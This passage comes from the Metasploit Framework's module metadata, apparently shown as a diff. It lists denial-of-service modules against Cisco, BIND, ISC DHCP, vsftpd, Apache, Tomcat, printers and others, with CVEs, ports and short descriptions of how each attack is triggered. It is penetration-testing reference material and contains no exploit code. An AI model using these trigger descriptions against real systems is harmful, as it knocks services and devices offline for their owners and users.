"mod_time": "2020-08-21 13:13:33 +0000", - "path": "/modules/auxiliary/dos/cisco/cisco_7937g_dos.py", - "is_install_path": true, - "ref_name": "dos/cisco/cisco_7937g_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/cisco/cisco_7937g_dos_reboot": { - "name": "Cisco 7937G Denial-of-Service Reboot Attack", - "fullname": "auxiliary/dos/cisco/cisco_7937g_dos_reboot", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-06-02", - "type": "auxiliary", - "author": [ - "Cody Martin" - ], - "description": "This module exploits a bug in how the conference station handles \n\texecuting a ping via its web interface. By repeatedly executing \n\tthe ping function without clearing out the resulting output, \n\ta DoS is caused that will reset the device after a few minutes.", - "references": [ - "URL-https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/", - "CVE-2020-16139" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-08-21 09:01:45 +0000", - "path": "/modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.py", - "is_install_path": true, - "ref_name": "dos/cisco/cisco_7937g_dos_reboot", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/cisco/ios_http_percentpercent": { - "name": "Cisco IOS HTTP GET /%% Request Denial of Service", - "fullname": "auxiliary/dos/cisco/ios_http_percentpercent", - "aliases": [], - "rank": 300, - "disclosure_date": "2000-04-26", - "type": "auxiliary", - "author": [ - "aushack " - ], - "description": "This module triggers a Denial of Service condition in the Cisco IOS\n HTTP server. By sending a GET request for \"/%%\", the device becomes\n unresponsive. IOS 11.1 -> 12.1 are reportedly vulnerable. This module\n tested successfully against a Cisco 1600 Router IOS v11.2(18)P.", - "references": [ - "BID-1154", - "CVE-2000-0380", - "OSVDB-1302" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb", - "is_install_path": true, - "ref_name": "dos/cisco/ios_http_percentpercent", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/cisco/ios_telnet_rocem": { - "name": "Cisco IOS Telnet Denial of Service", - "fullname": "auxiliary/dos/cisco/ios_telnet_rocem", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-03-17", - "type": "auxiliary", - "author": [ - "Artem Kondratenko" - ], - "description": "This module triggers a Denial of Service condition in the Cisco IOS\n telnet service affecting multiple Cisco switches. Tested against Cisco\n Catalyst 2960 and 3750.", - "references": [ - "BID-96960", - "CVE-2017-3881", - "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp", - "URL-https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution" - ], - "platform": "", - "arch": "", - "rport": 23, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/cisco/ios_telnet_rocem.rb", - "is_install_path": true, - "ref_name": "dos/cisco/ios_telnet_rocem", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/dhcp/isc_dhcpd_clientid": { - "name": "ISC DHCP Zero Length ClientID Denial of Service Module", - "fullname": "auxiliary/dos/dhcp/isc_dhcpd_clientid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "sid", - "theLightCosine " - ], - "description": "This module performs a Denial of Service Attack against the ISC DHCP server,\n versions 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1. It sends out a DHCP Request\n message with a 0-length client_id option for an IP address on the appropriate range\n for the dhcp server. When ISC DHCP Server tries to hash this value it exits\n abnormally.", - "references": [ - "CVE-2010-2156", - "OSVDB-65246", - "EDB-14185" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2019-03-05 03:38:51 +0000", - "path": "/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb", - "is_install_path": true, - "ref_name": "dos/dhcp/isc_dhcpd_clientid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/dns/bind_tkey": { - "name": "BIND TKEY Query Denial of Service", - "fullname": "auxiliary/dos/dns/bind_tkey", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-07-28", - "type": "auxiliary", - "author": [ - "Jonathan Foote", - "throwawayokejxqbbif", - "wvu " - ], - "description": "This module sends a malformed TKEY query, which exploits an\n error in handling TKEY queries on affected BIND9 'named' DNS servers.\n As a result, a vulnerable named server will exit with a REQUIRE\n assertion failure. This condition can be exploited in versions of BIND\n between BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0\n through 9.10.2-P2.", - "references": [ - "CVE-2015-5477", - "URL-http://web.archive.org/web/20190425014550/https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/", - "URL-https://kb.isc.org/article/AA-01272" - ], - "platform": "", - "arch": "", - "rport": 53, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/dos/dns/bind_tkey.rb", - "is_install_path": true, - "ref_name": "dos/dns/bind_tkey", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/dns/bind_tsig": { - "name": "BIND TSIG Query Denial of Service", - "fullname": "auxiliary/dos/dns/bind_tsig", - "aliases": [], - "rank": 300, - "disclosure_date": "2016-09-27", - "type": "auxiliary", - "author": [ - "Martin Rocha", - "Ezequiel Tavella", - "Alejandro Parodi", - "Infobyte Research Team" - ], - "description": "A defect in the rendering of messages into packets can cause named to\n exit with an assertion failure in buffer.c while constructing a response\n to a query that meets certain criteria.\n\n This assertion can be triggered even if the apparent source address\n isn't allowed to make queries.", - "references": [ - "CVE-2016-2776", - "URL-http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html" - ], - "platform": "", - "arch": "", - "rport": 53, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/dns/bind_tsig.rb", - "is_install_path": true, - "ref_name": "dos/dns/bind_tsig", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/dns/bind_tsig_badtime": { - "name": "BIND TSIG Badtime Query Denial of Service", - "fullname": "auxiliary/dos/dns/bind_tsig_badtime", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-05-19", - "type": "auxiliary", - "author": [ - "Tobias Klein", - "Shuto Imai" - ], - "description": "A logic error in code which checks TSIG validity can be used to\n trigger an assertion failure in tsig.c.", - "references": [ - "CVE-2020-8617", - "URL-https://gitlab.isc.org/isc-projects/bind9/-/issues/1703", - "URL-https://www.trapkit.de/advisories/TKADV2020-002.txt" - ], - "platform": "", - "arch": "", - "rport": 53, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/auxiliary/dos/dns/bind_tsig_badtime.rb", - "is_install_path": true, - "ref_name": "dos/dns/bind_tsig_badtime", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/freebsd/nfsd/nfsd_mount": { - "name": "FreeBSD Remote NFS RPC Request Denial of Service", - "fullname": "auxiliary/dos/freebsd/nfsd/nfsd_mount", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "This module sends a specially-crafted NFS Mount request causing a\n kernel panic on host running FreeBSD 6.0.", - "references": [ - "BID-16838", - "OSVDB-23511", - "CVE-2006-0900" - ], - "platform": "", - "arch": "", - "rport": 2049, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb", - "is_install_path": true, - "ref_name": "dos/freebsd/nfsd/nfsd_mount", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/ftp/vsftpd_232": { - "name": "VSFTPD 2.3.2 Denial of Service", - "fullname": "auxiliary/dos/ftp/vsftpd_232", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-02-03", - "type": "auxiliary", - "author": [ - "Nick Cottrell (Rad10Logic) ", - "Anna Graterol ", - "Mana Mostaani ", - "Maksymilian Arciemowicz" - ], - "description": "This module triggers a Denial of Service condition in the VSFTPD server in\n versions before 2.3.3. So far, it has been tested on 2.3.0, 2.3.1, and 2.3.2.", - "references": [ - "BID-46617", - "CVE-2011-0762", - "EDB-16270" - ], - "platform": "", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": null, - "mod_time": "2023-05-25 21:21:49 +0000", - "path": "/modules/auxiliary/dos/ftp/vsftpd_232.rb", - "is_install_path": true, - "ref_name": "dos/ftp/vsftpd_232", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/hp/data_protector_rds": { - "name": "HP Data Protector Manager RDS DOS", - "fullname": "auxiliary/dos/hp/data_protector_rds", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-01-08", - "type": "auxiliary", - "author": [ - "Roi Mallo ", - "sinn3r " - ], - "description": "This module causes a remote DOS on HP Data Protector's RDS service. By sending\n a malformed packet to port 1530, _rm32.dll causes RDS to crash due to an enormous\n size for malloc().", - "references": [ - "CVE-2011-0514", - "OSVDB-70617", - "EDB-15940" - ], - "platform": "", - "arch": "", - "rport": 1530, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/hp/data_protector_rds.rb", - "is_install_path": true, - "ref_name": "dos/hp/data_protector_rds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/3com_superstack_switch": { - "name": "3Com SuperStack Switch Denial of Service", - "fullname": "auxiliary/dos/http/3com_superstack_switch", - "aliases": [], - "rank": 300, - "disclosure_date": "2004-06-24", - "type": "auxiliary", - "author": [ - "aushack " - ], - "description": "This module causes a temporary denial of service condition\n against 3Com SuperStack switches. By sending excessive data\n to the HTTP Management interface, the switch stops responding\n temporarily. The device does not reset. Tested successfully\n against a 3300SM firmware v2.66. Reported to affect versions\n prior to v2.72.", - "references": [ - "OSVDB-7246", - "CVE-2004-2691", - "URL-http://support.3com.com/infodeli/tools/switches/dna1695-0aaa17.pdf" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/http/3com_superstack_switch.rb", - "is_install_path": true, - "ref_name": "dos/http/3com_superstack_switch", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/apache_commons_fileupload_dos": { - "name": "Apache Commons FileUpload and Apache Tomcat DoS", - "fullname": "auxiliary/dos/http/apache_commons_fileupload_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-02-06", - "type": "auxiliary", - "author": [ - "Unknown", - "ribeirux" - ], - "description": "This module triggers an infinite loop in Apache Commons FileUpload 1.0\n through 1.3 via a specially crafted Content-Type header.\n Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle\n mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50\n and 8.0.0-RC1 through 8.0.1 are affected by this issue. Tomcat 6 also\n uses Commons FileUpload as part of the Manager application.", - "references": [ - "CVE-2014-0050", - "URL-https://tomcat.apache.org/security-8.html", - "URL-https://tomcat.apache.org/security-7.html" - ], - "platform": "", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb", - "is_install_path": true, - "ref_name": "dos/http/apache_commons_fileupload_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/apache_mod_isapi": { - "name": "Apache mod_isapi Dangling Pointer", - "fullname": "auxiliary/dos/http/apache_mod_isapi", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-03-05", - "type": "auxiliary", - "author": [ - "Brett Gervasoni", - "jduck " - ], - "description": "This module triggers a use-after-free vulnerability in the Apache\n Software Foundation mod_isapi extension for versions 2.2.14 and earlier.\n In order to reach the vulnerable code, the target server must have an\n ISAPI module installed and configured.\n\n By making a request that terminates abnormally (either an aborted TCP\n connection or an unsatisfied chunked request), mod_isapi will unload the\n ISAPI extension. Later, if another request comes for that ISAPI module,\n previously obtained pointers will be used resulting in an access\n violation or potentially arbitrary code execution.\n\n Although arbitrary code execution is theoretically possible, a\n real-world method of invoking this consequence has not been proven. In\n order to do so, one would need to find a situation where a particular\n ISAPI module loads at an image base address that can be re-allocated by\n a remote attacker.\n\n Limited success was encountered using two separate ISAPI modules. In\n this scenario, a second ISAPI module was loaded into the same memory\n area as the previously unloaded module.", - "references": [ - "CVE-2010-0425", - "OSVDB-62674", - "BID-38494", - "URL-https://bz.apache.org/bugzilla/show_bug.cgi?id=48509", - "URL-https://web.archive.org/web/20100715032229/http://www.gossamer-threads.com/lists/apache/cvs/381537", - "URL-http://www.senseofsecurity.com.au/advisories/SOS-10-002", - "EDB-11650" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/http/apache_mod_isapi.rb", - "is_install_path": true, - "ref_name": "dos/http/apache_mod_isapi", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/apache_range_dos": { - "name": "Apache Range Header DoS (Apache Killer)", - "fullname": "auxiliary/dos/http/apache_range_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-08-19", - "type": "auxiliary", - "author": [ - "Kingcope", - "Masashi Fujiwara", - "Markus Neis " - ], - "description": "The byterange filter in the Apache HTTP Server 2.0.x through 2.0.64, and 2.2.x\n through 2.2.19 allows remote attackers to cause a denial of service (memory and\n CPU consumption) via a Range header that expresses multiple overlapping ranges,\n exploit called \"Apache Killer\"", - "references": [ - "BID-49303", - "CVE-2011-3192", - "EDB-17696", - "OSVDB-74721" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/http/apache_range_dos.rb", - "is_install_path": true, - "ref_name": "dos/http/apache_range_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "CHECK", - "description": "Check if target is vulnerable" - }, - { - "name": "DOS", - "description": "Trigger Denial of Service against target" - } - ] - }, - "auxiliary_dos/http/apache_tomcat_transfer_encoding": { - "name": "Apache Tomcat Transfer-Encoding Information Disclosure and DoS", - "fullname": "auxiliary/dos/http/apache_tomcat_transfer_encoding", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-07-09", - "type": "auxiliary", - "author": [ - "Steve Jones", - "Hoagie ", - "Paulino Calderon " - ], - "description": "Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not\n properly handle an invalid Transfer-Encoding header, which allows remote attackers\n to cause a denial of service (application outage) or obtain sensitive information\n via a crafted header that interferes with \"recycling of a buffer.\"", - "references": [ - "CVE-2010-2227", - "OSVDB-66319", - "BID-41544" - ], - "platform": "", - "arch": "", - "rport": 8000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb", - "is_install_path": true, - "ref_name": "dos/http/apache_tomcat_transfer_encoding", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/brother_debut_dos": { - "name": "Brother Debut http Denial Of Service", - "fullname": "auxiliary/dos/http/brother_debut_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-11-02", - "type": "auxiliary", - "author": [ - "z00n <0xz00n@gmail.com>", - "h00die" - ], - "description": "The Debut embedded HTTP server <= 1.20 on Brother printers allows for a Denial\n of Service (DoS) condition via a crafted HTTP request. The printer will be\n unresponsive from HTTP and printing requests for ~300 seconds. After which, the\n printer will start responding again.", - "references": [ - "CVE-2017-16249", - "URL-https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18730" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/http/brother_debut_dos.rb", - "is_install_path": true, - "ref_name": "dos/http/brother_debut_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/cable_haunt_websocket_dos": { - "name": "\"Cablehaunt\" Cable Modem WebSocket DoS", - "fullname": "auxiliary/dos/http/cable_haunt_websocket_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-01-07", - "type": "auxiliary", - "author": [ - "Alexander Dalsgaard Krog (Lyrebirds)", - "Jens Hegner Stærmose (Lyrebirds)", - "Kasper Kohsel Terndrup (Lyrebirds)", - "Simon Vandel Sillesen (Independent)", - "Nicholas Starke" - ], - "description": "There exists a buffer overflow vulnerability in certain\n Cable Modem Spectrum Analyzer interfaces. This overflow\n is exploitable, but since an exploit would differ between\n every make, model, and firmware version (which also\n differs from ISP to ISP), this module simply causes a\n Denial of Service to test if the vulnerability is present.", - "references": [ - "CVE-2019-19494", - "EDB-47936", - "URL-https://cablehaunt.com/", - "URL-https://github.com/Lyrebirds/sagemcom-fast-3890-exploit" - ], - "platform": "", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/auxiliary/dos/http/cable_haunt_websocket_dos.rb", - "is_install_path": true, - "ref_name": "dos/http/cable_haunt_websocket_dos", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/canon_wireless_printer": { - "name": "Canon Wireless Printer Denial Of Service", - "fullname": "auxiliary/dos/http/canon_wireless_printer", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-06-18", - "type": "auxiliary", - "author": [ - "Matt \"hostess\" Andreko " - ], - "description": "The HTTP management interface on several models of Canon Wireless printers\n allows for a Denial of Service (DoS) condition via a crafted HTTP request. Note:\n if this module is successful, the device can only be recovered with a physical\n power cycle.", - "references": [ - "CVE-2013-4615", - "URL-https://www.mattandreko.com/2013/06/canon-y-u-no-security.html" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/http/canon_wireless_printer.rb", - "is_install_path": true, - "ref_name": "dos/http/canon_wireless_printer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/dell_openmanage_post": { - "name": "Dell OpenManage POST Request Heap Overflow (win32)", - "fullname": "auxiliary/dos/http/dell_openmanage_post", - "aliases": [], - "rank": 300, - "disclosure_date": "2004-02-26", - "type": "auxiliary", - "author": [ - "aushack " - ], - "description": "This module exploits a heap overflow in the Dell OpenManage\n Web Server (omws32.exe), versions 3.2-3.7.1. The vulnerability\n exists due to a boundary error within the handling of POST requests,\n where the application input is set to an overly long file name.\n This module will crash the web server, however it is likely exploitable\n under certain conditions.", - "references": [ - "URL-http://archives.neohapsis.com/archives/bugtraq/2004-02/0650.html", - "BID-9750", - "OSVDB-4077", - "CVE-2004-0331" - ], - "platform": "", - "arch": "", - "rport": 1311, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/http/dell_openmanage_post.rb", - "is_install_path": true, - "ref_name": "dos/http/dell_openmanage_post", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/f5_bigip_apm_max_sessions": { - "name": "F5 BigIP Access Policy Manager Session Exhaustion Denial of Service", - "fullname": "auxiliary/dos/http/f5_bigip_apm_max_sessions", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Denis Kolegov ", - "Oleg Broslavsky ", - "Nikita Oleksov " - ], - "description": "This module exploits a resource exhaustion denial of service in F5 BigIP devices. An\n unauthenticated attacker can establish multiple connections with BigIP Access Policy\n Manager (APM) and exhaust all available sessions defined in customer license. In the\n first step of the BigIP APM negotiation the client sends a HTTP request. The BigIP\n system creates a session, marks it as pending and then redirects the client to an access\n policy URI. Since BigIP allocates a new session after the first unauthenticated request,\n and deletes the session only if an access policy timeout expires, the attacker can exhaust\n all available sessions by repeatedly sending the initial HTTP request and leaving the\n sessions as pending.", - "references": [ - "URL-https://support.f5.com/kb/en-us/products/big-ip_apm/releasenotes/product/relnote-apm-11-6-0.html" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb", - "is_install_path": true, - "ref_name": "dos/http/f5_bigip_apm_max_sessions", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/flexense_http_server_dos": { - "name": "Flexense HTTP Server Denial Of Service", - "fullname": "auxiliary/dos/http/flexense_http_server_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-03-09", - "type": "auxiliary", - "author": [ - "Ege Balci " - ], - "description": "This module triggers a Denial of Service vulnerability in the Flexense HTTP server.\n Vulnerability caused by a user mode write access memory violation and can be triggered with\n rapidly sending variety of HTTP requests with long HTTP header values.\n\n Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below versions reportedly vulnerable.", - "references": [ - "CVE-2018-8065", - "URL-https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/dos/http/flexense_http_server_dos.rb", - "is_install_path": true, - "ref_name": "dos/http/flexense_http_server_dos", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/gzip_bomb_dos": { - "name": "Gzip Memory Bomb Denial Of Service", - "fullname": "auxiliary/dos/http/gzip_bomb_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2004-01-01", - "type": "auxiliary", - "author": [ - "info ", - "joev " - ], - "description": "This module generates and hosts a 10MB single-round gzip file that decompresses to 10GB.\n Many applications will not implement a length limit check and will eat up all memory and\n eventually die. This can also be used to kill systems that download/parse content from\n a user-provided URL (image-processing servers, AV, websites that accept zipped POST data, etc).\n\n A FILEPATH datastore option can also be provided to save the .gz bomb locally.\n\n Some clients (Firefox) will allow for multiple rounds of gzip. Most gzip utils will correctly\n deflate multiple rounds of gzip on a file. Setting ROUNDS=3 and SIZE=10240 (default value)\n will generate a 300 byte gzipped file that expands to 10GB.", - "references": [ - "URL-http://www.aerasec.de/security/advisories/decompression-bomb-vulnerability.html" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/http/gzip_bomb_dos.rb", - "is_install_path": true, - "ref_name": "dos/http/gzip_bomb_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "WebServer", - "description": "Host file via web server" - } - ] - }, - "auxiliary_dos/http/hashcollision_dos": { - "name": "Hashtable Collisions", - "fullname": "auxiliary/dos/http/hashcollision_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-12-28", - "type": "auxiliary", - "author": [ - "Alexander Klink", - "Julian Waelde", - "Scott A. Crosby", - "Dan S. Wallach", - "Krzysztof Kotowicz", - "Christian Mehlmauer " - ], - "description": "This module uses a denial-of-service (DoS) condition appearing in a variety of\n programming languages. This vulnerability occurs when storing multiple values\n in a hash table and all values have the same hash value. This can cause a web server\n parsing the POST parameters issued with a request into a hash table to consume\n hours of CPU with a single HTTP request.\n\n Currently, only the hash functions for PHP and Java are implemented.\n This module was tested with PHP + httpd, Tomcat, Glassfish and Geronimo.\n It also generates a random payload to bypass some IDS signatures.", - "references": [ - "URL-http://ocert.org/advisories/ocert-2011-003.html", - "URL-https://web.archive.org/web/20120105151644/http://www.nruns.com/_downloads/advisory28122011.pdf", - "URL-https://fahrplan.events.ccc.de/congress/2011/Fahrplan/events/4680.en.html", - "URL-https://fahrplan.events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf", - "URL-https://www.youtube.com/watch?v=R2Cq3CLI6H8", - "CVE-2011-5034", - "CVE-2011-5035", - "CVE-2011-4885", - "CVE-2011-4858" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/http/hashcollision_dos.rb", - "is_install_path": true, - "ref_name": "dos/http/hashcollision_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/ibm_lotus_notes": { - "name": "IBM Notes encodeURI DOS", - "fullname": "auxiliary/dos/http/ibm_lotus_notes", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-08-31", - "type": "auxiliary", - "author": [ - "Dhiraj Mishra" - ], - "description": "This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.\n If successful, it could cause the Notes client to hang and have to be restarted.", - "references": [ - "EDB-42602", - "CVE-2017-1129", - "URL-http://www-01.ibm.com/support/docview.wss?uid=swg21999385" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2023-03-22 12:52:15 +0000", - "path": "/modules/auxiliary/dos/http/ibm_lotus_notes.rb", - "is_install_path": true, - "ref_name": "dos/http/ibm_lotus_notes", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "WebServer", - "description": "Serve exploit via web server" - } - ] - }, - "auxiliary_dos/http/ibm_lotus_notes2": { - "name": "IBM Notes Denial Of Service", - "fullname": "auxiliary/dos/http/ibm_lotus_notes2", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-08-31", - "type": "auxiliary", - "author": [ - "Dhiraj Mishra" - ], - "description": "This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.\n If successful, the browser will crash after viewing the webpage.", - "references": [ - "EDB-42604", - "CVE-2017-1130" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - 